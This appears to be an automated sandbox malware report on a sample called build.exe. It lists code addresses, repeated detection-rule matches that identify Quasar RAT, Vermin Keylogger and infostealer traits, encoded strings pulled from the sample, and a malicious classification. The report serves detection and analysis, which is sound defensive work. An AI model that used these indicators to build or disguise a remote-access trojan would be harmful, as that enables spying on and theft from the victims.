Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_0041611C NtQueryDefaultLocale,	5_2_0041611C
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00416C1C NtQueryDefaultLocale,	5_2_00416C1C
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00417150 NtQueryDefaultLocale,	5_2_00417150
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_004169D2 NtQueryDefaultLocale,	5_2_004169D2
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_004175F9 NtQueryDefaultLocale,	5_2_004175F9
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00417194 NtQueryDefaultLocale,	5_2_00417194
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_004166E1 NtQueryDefaultLocale,	5_2_004166E1
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00417344 NtQueryDefaultLocale,	5_2_00417344
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00417331 NtQueryDefaultLocale,	5_2_00417331
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00416FFE NtQueryDefaultLocale,	5_2_00416FFE
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00417392 NtQueryDefaultLocale,	5_2_00417392

Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_004070F4	5_2_004070F4
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_0041CD00	5_2_0041CD00
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_0052D910	5_2_0052D910
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_004169D2	5_2_004169D2
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_0041D257	5_2_0041D257
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00401ECD	5_2_00401ECD
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_004166E1	5_2_004166E1
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_0041CABA	5_2_0041CABA
Source: C:\Users\user\Desktop\build.exe	Code function: 5_2_00407302	5_2_00407302
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_0663A550	9_2_0663A550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_06639C80	9_2_06639C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_06639938	9_2_06639938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_0AE46359	9_2_0AE46359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 9_2_0AE400D3	9_2_0AE400D3

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarRAT author = ditekSHen, description = QuasarRAT payload
Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Quasarrat_e52df647 reference_sample = a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d, os = windows, severity = x86, creation_date = 2021-06-27, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Quasarrat, fingerprint = c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815, id = e52df647-c197-4790-b051-8951fba80c3b, last_modified = 2021-08-23
Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Quasar hash1 = 390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan

Source: 5.2.build.exe.64179a.1.raw.unpack, ----.cs

Base64 encoded string: 'wUl/f9Z9c0HJkgn0LkR3tgx0jNemZdZZXwtrjN37gTmQDAxJ4eNPr2zJxD5FzUY1jQK6EfZUz8L7LpT8o9WAQw==', 'vVjY5ZJ6o3UiZAcBxrVNLmrSiaHSFpdrImDrkV5LGLuTGeXI8KiLiDnHeoQPgWKXayXFoAm9/HPYQx9jgdEuUw==', 'NloEf4TXdEEtCAPA23YG77hR2gBZhlUN5TMEkM69F+Eyq9b1haRauu4n35RqUTobX693FMns3mIxEX0yOeSzgQ==', 'XdMKS0zmM2HqG9GB1xiQOPNEdup7dD0JGElTLtP+P7K5Dnyc0uQgFoqEeNn8lfszXBTQHP8SNtp2QEKv5Cc6pyOM0UMg6xlul+IBxcQoqFA=', '/M1VhpGWTx0I8npMFdssAo9WCr99LhMb3S5IME+AIGA7a506KCvXiQj+jZ6MhEim1zeP2ZJxzqpHwOWk66wdXQ==', 'prnH13WVqb4TCDeg4YtKiDyngbILmcdacqg0YSiDr2WBGmyAGWjNA3LD2I6nE9qzXt7sbFGVZ7vpLp6yHEghoA=='

Source: classification engine

Classification label: mal100.troj.spyw.evad.winHTA@10/3@3/4

